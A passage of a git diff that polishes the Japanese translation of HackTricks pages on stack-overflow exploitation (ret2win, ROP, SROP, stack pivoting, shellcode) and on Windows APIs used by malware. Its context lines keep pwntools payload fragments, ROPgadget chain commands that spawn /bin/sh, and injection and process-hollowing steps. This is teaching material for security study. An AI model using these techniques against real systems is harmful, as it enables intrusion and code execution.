 ```python
 objdump -d vuln_binary | grep "\.text"
 Disassembly of section .text:
@@ -200,9 +200,9 @@ MAIN_PLT = 0x401080
 
 バイナリがPutsを使用していない場合は、次のことを確認してください。
 
-## `sh: 1: %s%s%s%s%s%s%s%s: not found`
+## `sh: 1: %s%s%s%s%s%s%s%s: 見つかりません`
 
-すべてのエクスプロイトを作成した後にこの**エラー**が見つかった場合: `sh: 1: %s%s%s%s%s%s%s%s: not found`
+すべてのエクスプロイトを作成した後にこの**エラー**が見つかった場合: `sh: 1: %s%s%s%s%s%s%s%s: 見つかりません`
 
 **"/bin/sh"のアドレスから64バイトを引いてみてください**:
 ```python
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
index 0761019f3..3b0ce6325 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
@@ -4,7 +4,7 @@
 
 ## 基本情報
 
-**Ret2win** チャレンジは、特に **バイナリエクスプロイト** を含むタスクにおいて、**Capture The Flag (CTF)** コンペティションで人気のあるカテゴリーです。目的は、与えられたバイナリの脆弱性を悪用して、バイナリ内の特定の未呼び出し関数を実行することです。この関数は通常、`win`、`flag` などの名前が付けられています。この関数が実行されると、通常はフラグや成功メッセージが出力されます。チャレンジは通常、スタック上の **リターンアドレス** を上書きして、実行フローを目的の関数に転送することを含みます。以下は、例を交えた詳細な説明です。
+**Ret2win** チャレンジは、特に **バイナリエクスプロイト** を含むタスクにおいて、**Capture The Flag (CTF)** コンペティションで人気のあるカテゴリーです。目的は、与えられたバイナリの脆弱性を利用して、バイナリ内の特定の未呼び出し関数を実行することです。この関数は通常、`win`、`flag` などの名前が付けられています。この関数が実行されると、通常はフラグや成功メッセージが出力されます。チャレンジは通常、スタック上の **リターンアドレス** を上書きして、実行フローを目的の関数に転送することを含みます。以下は、例を交えた詳細な説明です。
 
 ### Cの例
 
@@ -27,7 +27,7 @@ vulnerable_function();
 return 0;
 }
 ```
-このプログラムをスタック保護なしで、**ASLR** を無効にしてコンパイルするには、次のコマンドを使用できます：
+このプログラムをスタック保護なしで、かつ **ASLR** を無効にしてコンパイルするには、次のコマンドを使用できます：
 ```sh
 gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
 ```
@@ -59,7 +59,7 @@ payload = b'A' * 68 + win_addr
 p.sendline(payload)
 p.interactive()
 ```
-`win`関数のアドレスを見つけるには、**gdb**、**objdump**、またはバイナリファイルを検査することを可能にする他のツールを使用できます。例えば、`objdump`を使用して、次のようにできます:
+`win` 関数のアドレスを見つけるには、**gdb**、**objdump**、またはバイナリファイルを検査することを可能にする他のツールを使用できます。例えば、`objdump` を使用して、次のようにできます:
 ```sh
 objdump -d vulnerable | grep win
 ```
@@ -69,7 +69,7 @@ Python スクリプトは、`vulnerable_function` によって処理されると
 
 ## 保護
 
-- [**PIE**](../common-binary-protections-and-bypasses/pie/) **は無効にするべきです**。そうしないと、アドレスが実行ごとに信頼できなくなり、関数が格納されるアドレスが常に同じではなくなるため、`win` 関数がどこにロードされているかを把握するために何らかのリークが必要になります。オーバーフローを引き起こす関数が `read` やそれに類似するものである場合、リターンアドレスを `win` 関数に変更するために、1 または 2 バイトの **部分上書き** を行うことができます。ASLR の動作のため、最後の 3 つの16進数ニブルはランダム化されないため、正しいリターンアドレスを取得する確率は **1/16**（1 ニブル）です。
+- [**PIE**](../common-binary-protections-and-bypasses/pie/) **は無効にするべきです**。そうしないと、アドレスが実行ごとに信頼できなくなり、関数が格納されるアドレスが常に同じではなくなるため、`win` 関数がどこにロードされているかを把握するために何らかのリークが必要になります。オーバーフローを引き起こす関数が `read` やそれに類似するものである場合、リターンアドレスを `win` 関数に変更するために 1 または 2 バイトの **部分上書き** を行うことができます。ASLR の動作のため、最後の 3 つの16進数ニブルはランダム化されないため、正しいリターンアドレスを取得する確率は **1/16**（1 ニブル）です。
 - [**スタックカナリア**](../common-binary-protections-and-bypasses/stack-canaries/) も無効にするべきです。そうしないと、侵害された EIP リターンアドレスは決して追跡されません。
 
 ## その他の例と参考文献
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
index 4719e711f..fcb2163fc 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
@@ -21,7 +21,7 @@
 ### **x86 (32ビット) 呼び出し規約**
 
 - **cdecl**: 呼び出し元がスタックをクリーンアップします。関数引数は逆順（右から左）でスタックにプッシュされます。**引数は右から左にスタックにプッシュされます。**
-- **stdcall**: cdeclに似ていますが、呼び出し先がスタックのクリーンアップを担当します。
+- **stdcall**: cdeclに似ていますが、呼び出し先がスタックをクリーンアップする責任があります。
 
 ### **ガジェットの発見**
 
@@ -85,8 +85,8 @@ p.interactive()
 
 私たちの目的のために、**RDI** レジスタを設定することを可能にするガジェットに焦点を当てましょう（**"/bin/sh"** 文字列を **system()** に引数として渡すため）そしてその後 **system()** 関数を呼び出します。以下のガジェットを特定したと仮定します：
 
-- **pop rdi; ret**: スタックのトップの値を **RDI** にポップし、その後戻ります。**system()** の引数を設定するために不可欠です。
-- **ret**: 単純なリターンで、いくつかのシナリオでスタックの整列に役立ちます。
+- **pop rdi; ret**: スタックのトップ値を **RDI** にポップし、その後戻ります。**system()** の引数を設定するために不可欠です。
+- **ret**: シンプルなリターンで、いくつかのシナリオでスタックの整列に役立ちます。
 
 そして、**system()** 関数のアドレスを知っています。
 
@@ -135,7 +135,7 @@ p.interactive()
 
 ### スタックアライメント
 
-**x86-64 ABI** は、**call命令** が実行されるときに **スタックが16バイトアライメント** されることを保証します。**LIBC** はパフォーマンスを最適化するために、**SSE命令**（例えば **movaps**）を使用し、このアライメントを必要とします。スタックが適切にアライメントされていない場合（つまり **RSP** が16の倍数でない場合）、**ROPチェーン** での **system** への呼び出しは失敗します。これを修正するには、ROPチェーンで **system** を呼び出す前に **ret gadget** を追加するだけです。
+**x86-64 ABI** は、**call命令** が実行されるときに **スタックが16バイトアライメント** されることを保証します。**LIBC** はパフォーマンスを最適化するために、**SSE命令**（例えば **movaps**）を使用し、このアライメントを必要とします。スタックが適切にアライメントされていない場合（つまり **RSP** が16の倍数でない場合）、**ROPチェーン** での **system** などの関数呼び出しは失敗します。これを修正するには、ROPチェーンで **system** を呼び出す前に **ret gadget** を追加するだけです。
 
 ## x86 と x64 の主な違い
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
index 2ed3202fa..dc3ac9659 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
@@ -6,7 +6,7 @@
 
 これはRet2libに似ていますが、この場合はライブラリから関数を呼び出すことはありません。この場合、すべては`sys_execve`システムコールを引数付きで呼び出し、`/bin/sh`を実行するために準備されます。この技術は通常、静的にコンパイルされたバイナリで実行されるため、多くのガジェットやシステムコール命令が存在する可能性があります。
 
-**syscall**の呼び出しを準備するためには、次の設定が必要です：
+**syscall**の呼び出しを準備するためには、次の構成が必要です：
 
 - `rax: 59 sys_execveを指定`
 - `rdi: "/bin/sh"へのポインタ 実行するファイルを指定`
@@ -28,7 +28,7 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
 0x00000000004101f3 : pop rsi ; ret
 0x00000000004498b5 : pop rdx ; ret
 ```
-これらのアドレスを使用すると、**スタックにコンテンツを書き込み、レジスタにロードする**ことが可能です。
+これらのアドレスを使用すると、**スタックに内容を書き込み、レジスタにロードする**ことができます。
 
 ## 文字列の書き込み
 
@@ -45,14 +45,14 @@ Start              End                Offset             Perm Path
 ```
 ### メモリに文字列を書く
 
-次に、このアドレスに任意のコンテンツを書き込む方法を見つける必要があります。
+次に、このアドレスに任意の内容を書き込む方法を見つける必要があります。
 ```bash
 ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
 mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
 ```
 ### ROPチェーンの自動化
 
-次のコマンドは、書き込み可能なガジェットとシステムコール命令がある場合に、静的バイナリから完全な `sys_execve` ROPチェーンを作成します:
+次のコマンドは、書き込み可能なガジェットとシステムコール命令がある場合に、静的バイナリから完全な `sys_execve` ROPチェーンを作成します：
 ```bash
 ROPgadget --binary vuln --ropchain
 ```
@@ -94,7 +94,7 @@ rop += popRax
 rop += p64(0x6b6000) # Writable memory
 rop += writeGadget #Address to: mov qword ptr [rax], rdx
 ```
-## ガジェットが不足している
+## ガジェットの不足
 
 もし**ガジェットが不足している**場合、例えばメモリに`/bin/sh`を書き込むために、スタックからすべてのレジスタ値（RIPやパラメータレジスタを含む）を制御するために**SROP技術**を使用できます：
 
@@ -174,11 +174,11 @@ target.interactive()
 ## その他の例と参考文献
 
 - [https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)
-- 64ビット、PIEなし、nx、`execve`を呼び出すROPをメモリに書き込み、そこにジャンプします。
+- 64ビット、PIEなし、nx、メモリに`execve`を呼び出すROPを書き、そこにジャンプします。
 - [https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html](https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html)
-- 64ビット、nx、PIEなし、`execve`を呼び出すROPをメモリに書き込み、そこにジャンプします。スタックに書き込むために数学的操作を行う関数が悪用されます。
+- 64ビット、nx、PIEなし、メモリに`execve`を呼び出すROPを書き、そこにジャンプします。スタックに書き込むために数学的操作を行う関数が悪用されます。
 - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html)
-- 64ビット、PIEなし、nx、BFカナリア、`execve`を呼び出すROPをメモリに書き込み、そこにジャンプします。
+- 64ビット、PIEなし、nx、BFカナリア、メモリに`execve`を呼び出すROPを書き、そこにジャンプします。
 - [https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/)
 - 32ビット、ASLRなし、vDSOを使用してROPガジェットを見つけ、`execve`を呼び出します。
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
index 74f0bc3ec..9903d803c 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
@@ -4,14 +4,14 @@
 
 ## 基本情報
 
-**`Sigreturn`** は、主にシグナルハンドラの実行が完了した後のクリーンアップに使用される特別な **syscall** です。シグナルは、オペレーティングシステムからプログラムに送信される中断で、通常は何らかの例外的な状況が発生したことを示します。プログラムがシグナルを受け取ると、シグナルを処理するために **シグナルハンドラ** という特別な関数を使用して、現在の作業を一時的に中断します。
+**`Sigreturn`** は、主にシグナルハンドラの実行が完了した後のクリーンアップに使用される特別な **syscall** です。シグナルは、オペレーティングシステムによってプログラムに送信される中断で、通常は何らかの例外的な状況が発生したことを示します。プログラムがシグナルを受け取ると、シグナルを処理するために **シグナルハンドラ** という特別な関数を使用して、現在の作業を一時的に中断します。
 
 シグナルハンドラが終了した後、プログラムは何も起こらなかったかのように **以前の状態に戻る** 必要があります。ここで **`sigreturn`** が登場します。これは、プログラムが **シグナルハンドラから戻る** のを助け、シグナルハンドラによって使用されたスタックフレーム（関数呼び出しやローカル変数を格納するメモリのセクション）をクリーンアップすることでプログラムの状態を復元します。
 
-興味深いのは、**`sigreturn`** がプログラムの状態をどのように復元するかです：それは **すべてのCPUのレジスタ値をスタックに保存することによって** 行います。シグナルがもはやブロックされていないとき、**`sigreturn` はこれらの値をスタックからポップし**、実質的にCPUのレジスタをシグナルが処理される前の状態にリセットします。これには、スタックの現在のトップを指すスタックポインタレジスタ（RSP）が含まれます。
+興味深いのは、**`sigreturn`** がプログラムの状態をどのように復元するかです：それは **すべてのCPUのレジスタ値をスタックに保存することによって** 行われます。シグナルがもはやブロックされていないとき、**`sigreturn` はこれらの値をスタックからポップし**、実質的にCPUのレジスタをシグナルが処理される前の状態にリセットします。これには、スタックの現在のトップを指すスタックポインタレジスタ（RSP）が含まれます。
 
 > [!CAUTION]
-> ROPチェーンから **`sigreturn`** syscall を呼び出し、**レジスタ値を追加**することで、**スタック**にロードさせることができれば、すべてのレジスタ値を **制御** でき、したがって例えば `execve` syscall を `/bin/sh` で **呼び出す** ことが可能です。
+> ROPチェーンから **`sigreturn`** syscall を呼び出し、**スタックにロードしたいレジスタ値を追加する** ことで、すべてのレジスタ値を **制御** し、したがって例えば `execve` syscall を `/bin/sh` で **呼び出す** ことが可能です。
 
 これは、他のRet2syscallを呼び出すためのパラメータを制御するのをはるかに簡単にする **Ret2syscallの一種** であることに注意してください：
 
@@ -25,7 +25,7 @@ rop-syscall-execv.md
 
 ## 例
 
-[**ここに例があります**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop)が、これはそこからの最終的なエクスプロイトです：
+[**ここに例があります**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop)が見つけられますが、これはそこからの最終的なエクスプロイトです：
 ```python
 from pwn import *
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
index 30db8a806..5efab1e30 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
@@ -6,7 +6,7 @@
 
 この技術は、**ベースポインタ（EBP）**を操作する能力を利用して、EBPレジスタと`leave; ret`命令シーケンスを慎重に使用することで、複数の関数の実行をチェーンすることを可能にします。
 
-念のため、**`leave`**は基本的に次のことを意味します：
+念のため、**`leave`**は基本的に次の意味です：
 ```
 mov               esp, ebp
 pop               ebp
@@ -18,14 +18,14 @@ ret
 
 この技術は、**EBPレジスタを変更できるが、EIPレジスタを直接変更する方法がない場合**に特に有用です。これは、関数が実行を終了する際の動作を利用します。
 
-`fvuln`の実行中に、シェルコードのアドレスがあるメモリ領域を指す**偽のEBP**をスタックに注入することができれば（`pop`操作のために4バイトを加算）、EIPを間接的に制御できます。`fvuln`が戻ると、ESPはこの作成された位置に設定され、その後の`pop`操作によりESPは4減少し、**実際に攻撃者がそこに保存したアドレスを指すことになります。**\
+`fvuln`の実行中に、シェルコードのアドレスがあるメモリ領域を指す**偽のEBP**をスタックに注入できれば（`pop`操作のために4バイトを加算）、EIPを間接的に制御できます。`fvuln`が戻ると、ESPはこの作成された位置に設定され、その後の`pop`操作でESPが4減少し、**攻撃者がそこに保存したアドレスを指すことになります。**\
 2つのアドレスを**知っておく必要があることに注意してください**: ESPが向かうアドレスと、ESPが指すアドレスを書き込む必要があるアドレスです。
 
 #### エクスプロイト構築
 
 まず、**任意のデータ/アドレスを書き込むことができるアドレス**を知っておく必要があります。ESPはここを指し、**最初の`ret`を実行します**。
 
-次に、**任意のコードを実行する**ために使用される`ret`のアドレスを知っておく必要があります。以下を使用できます：
+次に、**任意のコードを実行する`ret`が使用するアドレス**を知っておく必要があります。以下を使用できます：
 
 - 有効な[**ONE_GADGET**](https://github.com/david942j/one_gadget)アドレス。
 - **`system()`**のアドレスの後に**4バイトのジャンク**と`"/bin/sh"`のアドレス（x86ビット）。
@@ -36,7 +36,7 @@ ret
 
 #### Off-By-Oneエクスプロイト
 
-この技術の特定のバリアントは「Off-By-Oneエクスプロイト」として知られています。これは、**EBPの最下位バイトのみを変更できる**場合に使用されます。この場合、**`ret`**でジャンプするアドレスを格納するメモリ位置はEBPと最初の3バイトを共有する必要があり、より制約のある条件で類似の操作が可能になります。
+この技術の特定のバリアントは「Off-By-Oneエクスプロイト」として知られています。これは、**EBPの最下位バイトのみを変更できる**場合に使用されます。この場合、**`ret`**でジャンプするアドレスを格納するメモリ位置はEBPと最初の3バイトを共有する必要があり、より制約のある条件で類似の操作が可能です。
 
 ### **EBPチェイニング**
 
@@ -91,8 +91,8 @@ print(p.recvline())
 ```
 ## EBPは無意味
 
-As [**explained in this post**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#off-by-one-1), if a binary is compiled with some optimizations, the **EBPはESPを制御することができません**。したがって、EBPを制御することによって機能する任意のエクスプロイトは基本的に失敗します。なぜなら、それには実際の効果がないからです。\
-これは、**プロローグとエピローグが変更される**ためです。バイナリが最適化されている場合。
+As [**explained in this post**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#off-by-one-1), バイナリがいくつかの最適化でコンパイルされている場合、**EBPはESPを制御することができません**。したがって、EBPを制御することによって機能するエクスプロイトは基本的に失敗します。なぜなら、それには実際の効果がないからです。\
+これは、バイナリが最適化されると**プロローグとエピローグが変更される**ためです。
 
 - **最適化されていない:**
 ```bash
@@ -120,7 +120,7 @@ ret                 # return
 
 ### **`pop rsp`** ガジェット
 
-[**このページ**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp)では、この技術を使用した例を見つけることができます。このチャレンジでは、2つの特定の引数を持つ関数を呼び出す必要があり、**`pop rsp` ガジェット**があり、**スタックからのリーク**があります：
+[**このページ**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp) では、この技術を使用した例を見つけることができます。このチャレンジでは、2つの特定の引数を持つ関数を呼び出す必要があり、**`pop rsp` ガジェット**があり、**スタックからのリーク**があります：
 ```python
 # Code from https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp
 # This version has added comments
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
index 1f1fe0a41..41721e989 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
@@ -4,7 +4,7 @@
 
 ## 基本情報
 
-**スタックシェルコード**は、攻撃者が脆弱なプログラムのスタックにシェルコードを書き込み、その後**命令ポインタ (IP)**または**拡張命令ポインタ (EIP)**をこのシェルコードの位置を指すように変更することで実行させる、バイナリエクスプロイトにおける技術です。これは、ターゲットシステムに対して不正アクセスを得たり、任意のコマンドを実行したりするために使用される古典的な方法です。以下に、プロセスの内訳を示し、シンプルなCの例と、**pwntools**を使用して対応するエクスプロイトを書く方法を説明します。
+**スタックシェルコード**は、攻撃者が脆弱なプログラムのスタックにシェルコードを書き込み、その後**命令ポインタ (IP)**または**拡張命令ポインタ (EIP)**をこのシェルコードの位置を指すように変更し、実行させるバイナリエクスプロイトの技術です。これは、ターゲットシステムに対して不正アクセスを得たり、任意のコマンドを実行したりするために使用される古典的な方法です。以下は、プロセスの内訳で、シンプルなCの例と、**pwntools**を使用して対応するエクスプロイトを書く方法を示します。
 
 ### Cの例: 脆弱なプログラム
 
@@ -35,7 +35,7 @@ gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
 - `-fno-stack-protector`: スタック保護を無効にします。
 - `-z execstack`: スタックを実行可能にし、スタックに保存されたシェルコードを実行するために必要です。
 - `-no-pie`: ポジション独立実行可能ファイルを無効にし、シェルコードが配置されるメモリアドレスを予測しやすくします。
-- `-m32`: プログラムを32ビット実行可能ファイルとしてコンパイルし、エクスプロイト開発の簡素化にしばしば使用されます。
+- `-m32`: プログラムを32ビット実行可能ファイルとしてコンパイルし、エクスプロイト開発の簡素化に役立ちます。
 
 ### Python Exploit using Pwntools
 
@@ -68,22 +68,22 @@ p.interactive()
 ```
 このスクリプトは、**NOPスライド**、**シェルコード**で構成されるペイロードを構築し、**EIP**をNOPスライドを指すアドレスで上書きして、シェルコードが実行されることを保証します。
 
-**NOPスライド**（`asm('nop')`）は、正確なアドレスに関係なく、実行がシェルコードに「スライド」する可能性を高めるために使用されます。`p32()`引数をバッファの開始アドレスにオフセットを加えたものに調整して、NOPスライドに到達させます。
+**NOPスライド**（`asm('nop')`）は、正確なアドレスに関係なく、実行がシェルコードに「スライド」する可能性を高めるために使用されます。`p32()`引数をバッファの開始アドレスにオフセットを加えたものに調整して、NOPスライドに到達します。
 
 ## 保護
 
-- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **は無効にするべき**で、アドレスが実行ごとに信頼できるものであるか、関数が格納されるアドレスが常に同じでない場合、win関数がどこにロードされているかを把握するために何らかのリークが必要になります。
-- [**スタックカナリア**](../common-binary-protections-and-bypasses/stack-canaries/)も無効にするべきで、侵害されたEIPの戻りアドレスは決して追跡されません。
+- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **は無効にするべき**で、そうしないとアドレスが実行ごとに信頼できなくなり、関数が格納されるアドレスが常に同じではなくなり、win関数がどこにロードされているかを把握するために何らかのリークが必要になります。
+- [**スタックカナリア**](../common-binary-protections-and-bypasses/stack-canaries/)も無効にするべきで、そうしないと侵害されたEIPの戻りアドレスは決して追跡されません。
 - [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) **スタック**保護は、スタック内のシェルコードの実行を防ぎます。なぜなら、その領域は実行可能ではないからです。
 
 ## その他の例と参考文献
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/shellcode](https://ir0nstone.gitbook.io/notes/types/stack/shellcode)
 - [https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html)
-- 64ビット、スタックアドレスリークを伴うASLR、シェルコードを書き、それにジャンプ
+- 64ビット、スタックアドレスリークを伴うASLR、シェルコードを書き込み、そこにジャンプ
 - [https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html)
-- 32ビット、スタックリークを伴うASLR、シェルコードを書き、それにジャンプ
+- 32ビット、スタックリークを伴うASLR、シェルコードを書き込み、そこにジャンプ
 - [https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html)
-- 32ビット、スタックリークを伴うASLR、exit()への呼び出しを防ぐための比較、変数を値で上書きし、シェルコードを書き、それにジャンプ
+- 32ビット、スタックリークを伴うASLR、exit()への呼び出しを防ぐための比較、変数を値で上書きし、シェルコードを書き込み、そこにジャンプ
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/reversing/common-api-used-in-malware.md b/src/reversing/common-api-used-in-malware.md
index 3549bb4ee..aef0762b3 100644
--- a/src/reversing/common-api-used-in-malware.md
+++ b/src/reversing/common-api-used-in-malware.md
@@ -19,7 +19,7 @@
 
 ### 永続性
 
-| レジストリ         | ファイル          | サービス                      |
+| Registry         | File          | Service                      |
 | ---------------- | ------------- | ---------------------------- |
 | RegCreateKeyEx() | GetTempPath() | OpenSCManager                |
 | RegOpenKeyEx()   | CopyFile()    | CreateService()              |
@@ -29,7 +29,7 @@
 
 ### 暗号化
 
-| 名前                  |
+| Name                  |
 | --------------------- |
 | WinCrypt              |
 | CryptAcquireContext() |
@@ -40,32 +40,32 @@
 
 ### 逆解析/VM
 
-| 関数名                                             | アセンブリ命令 |
-| --------------------------------------------------- | --------------------- |
-| IsDebuggerPresent()                                   | CPUID()               |
-| GetSystemInfo()                                      | IN()                  |
-| GlobalMemoryStatusEx()                                |                       |
-| GetVersion()                                          |                       |
+| Function Name                                             | Assembly Instructions |
+| --------------------------------------------------------- | --------------------- |
+| IsDebuggerPresent()                                       | CPUID()               |
+| GetSystemInfo()                                           | IN()                  |
+| GlobalMemoryStatusEx()                                    |                       |
+| GetVersion()                                              |                       |
 | CreateToolhelp32Snapshot \[プロセスが実行中か確認] |                       |
-| CreateFileW/A \[ファイルの存在確認]                  |                       |
+| CreateFileW/A \[ファイルの存在確認]                    |                       |
 
 ### ステルス
 
-| 名前                     |                                                                            |
+| Name                     |                                                                            |
 | ------------------------ | -------------------------------------------------------------------------- |
-| VirtualAlloc             | メモリを割り当てる (パッカー)                                             |
-| VirtualProtect           | メモリの権限を変更する (パッカーがセクションに実行権限を与える)         |
-| ReadProcessMemory        | 外部プロセスへの注入                                                    |
-| WriteProcessMemoryA/W    | 外部プロセスへの注入                                                    |
+| VirtualAlloc             | メモリを割り当てる (packers)                                               |
+| VirtualProtect           | メモリの権限を変更する (packerがセクションに実行権限を与える)               |
+| ReadProcessMemory        | 外部プロセスへの注入                                                      |
+| WriteProcessMemoryA/W    | 外部プロセスへの注入                                                      |
 | NtWriteVirtualMemory     |                                                                            |
-| CreateRemoteThread       | DLL/プロセス注入...                                                     |
+| CreateRemoteThread       | DLL/プロセス注入...                                                       |
 | NtUnmapViewOfSection     |                                                                            |
 | QueueUserAPC             |                                                                            |
 | CreateProcessInternalA/W |                                                                            |
 
 ### 実行
 
-| 関数名    |
+| Function Name    |
 | ---------------- |
 | CreateProcessA/W |
 | ShellExecute     |
@@ -95,24 +95,24 @@
 1. 悪意のあるDLLを注入するプロセスを特定する: CreateToolhelp32Snapshot, Process32First, Process32Next
 2. プロセスを開く: GetModuleHandle, GetProcAddress, OpenProcess
 3. プロセス内にDLLのパスを書く: VirtualAllocEx, WriteProcessMemory
-4. 悪意のあるDLLを読み込むスレッドをプロセス内に作成する: CreateRemoteThread, LoadLibrary
+4. 悪意のあるDLLをロードするスレッドをプロセス内に作成する: CreateRemoteThread, LoadLibrary
 
 使用する他の関数: NTCreateThreadEx, RtlCreateUserThread
 
 ### 反射DLL注入
 
-通常のWindows API呼び出しを行わずに悪意のあるDLLを読み込む。\
+通常のWindows API呼び出しを行わずに悪意のあるDLLをロードする。\
 DLLはプロセス内にマッピングされ、インポートアドレスを解決し、リロケーションを修正し、DllMain関数を呼び出す。
 
 ### スレッドハイジャック
 
-プロセスからスレッドを見つけて悪意のあるDLLを読み込ませる
+プロセスからスレッドを見つけて悪意のあるDLLをロードさせる
 
 1. ターゲットスレッドを見つける: CreateToolhelp32Snapshot, Thread32First, Thread32Next
 2. スレッドを開く: OpenThread
 3. スレッドを一時停止する: SuspendThread
 4. 被害者プロセス内に悪意のあるDLLのパスを書く: VirtualAllocEx, WriteProcessMemory
-5. ライブラリを読み込むスレッドを再開する: ResumeThread
+5. ライブラリをロードするスレッドを再開する: ResumeThread
 
 ### PE注入
 
@@ -120,12 +120,12 @@ DLLはプロセス内にマッピングされ、インポートアドレスを
 
 ### プロセスホロウイング
 
-マルウェアはプロセスのメモリから正当なコードをアンマップし、悪意のあるバイナリを読み込む
+マルウェアはプロセスのメモリから正当なコードをアンマップし、悪意のあるバイナリをロードする
 
 1. 新しいプロセスを作成する: CreateProcess
 2. メモリをアンマップする: ZwUnmapViewOfSection, NtUnmapViewOfSection
 3. プロセスメモリに悪意のあるバイナリを書く: VirtualAllocEc, WriteProcessMemory
-4. エントリーポイントを設定し、実行する: SetThreadContext, ResumeThread
+4. エントリポイントを設定し、実行する: SetThreadContext, ResumeThread
 
 ## フック
 
@@ -134,6 +134,6 @@ DLLはプロセス内にマッピングされ、インポートアドレスを
 - **IRP** (**I/O Request Packets**) はデータの断片を一つのコンポーネントから別のコンポーネントに送信する。カーネル内のほぼすべてのものがIRPを使用し、各デバイスオブジェクトにはフック可能な独自の関数テーブルがある: DKOM (Direct Kernel Object Manipulation)
 - **IAT** (**Import Address Table**) は依存関係を解決するのに役立つ。このテーブルをフックして呼び出されるコードをハイジャックすることが可能である。
 - **EAT** (**Export Address Table**) フック。このフックは**ユーザーランド**から行うことができる。目的はDLLによってエクスポートされた関数をフックすることである。
-- **インラインフック**: このタイプは達成が難しい。これは関数自体のコードを変更することを含む。おそらく、最初にジャンプを置くことによって。
+- **インラインフック**: このタイプは達成が難しい。これは関数自体のコードを修正することを含む。おそらく、最初にジャンプを置くことによって。
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/reversing/cryptographic-algorithms/README.md b/src/reversing/cryptographic-algorithms/README.md
index c324b3897..7803e13d7 100644
--- a/src/reversing/cryptographic-algorithms/README.md
+++ b/src/reversing/cryptographic-algorithms/README.md
@@ -6,7 +6,7 @@
 
 ## アルゴリズムの特定
 
-コードが**シフト右および左、XORおよびいくつかの算術演算**を使用している場合、それは**暗号化アルゴリズム**の実装である可能性が非常に高いです。ここでは、**各ステップを逆にすることなく使用されているアルゴリズムを特定する方法**をいくつか示します。
